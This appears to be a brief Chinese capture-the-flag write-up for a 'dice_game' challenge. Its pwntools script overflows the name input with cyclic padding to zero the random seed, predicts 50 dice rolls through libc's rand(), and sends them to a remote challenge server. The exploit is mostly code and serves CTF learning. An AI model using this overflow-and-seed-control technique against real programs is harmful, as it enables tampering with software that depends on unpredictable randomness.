因为是伪随机数, 所以可以覆盖seed的值, 然后得到伪随机数序列, 命中50次通关.
from pwn import *
from ctypes import *
libc = cdll.LoadLibrary("libc.so.6")
URL = "111.200.241.244"
PORT = 50956
sel = 1
io = process("./dice_game") if sel == 0 else remote(URL, PORT)
payload = cyclic(0x40) + p32(0)
io.recvuntil("Welcome, let me know your name: ")
io.sendline(payload)
Random = []
for i in range(50):
Random.append(libc.rand() % 6 + 1)
for i in range(50):
io.recvuntil("Give me the point(1~6): ")
io.sendline(str(Random[i]))
io.interactive()
总结
py脚本调用c库函数
from ctypes import *
libc = cdll.LoadLibrary("libc.so.6")
libc.rand()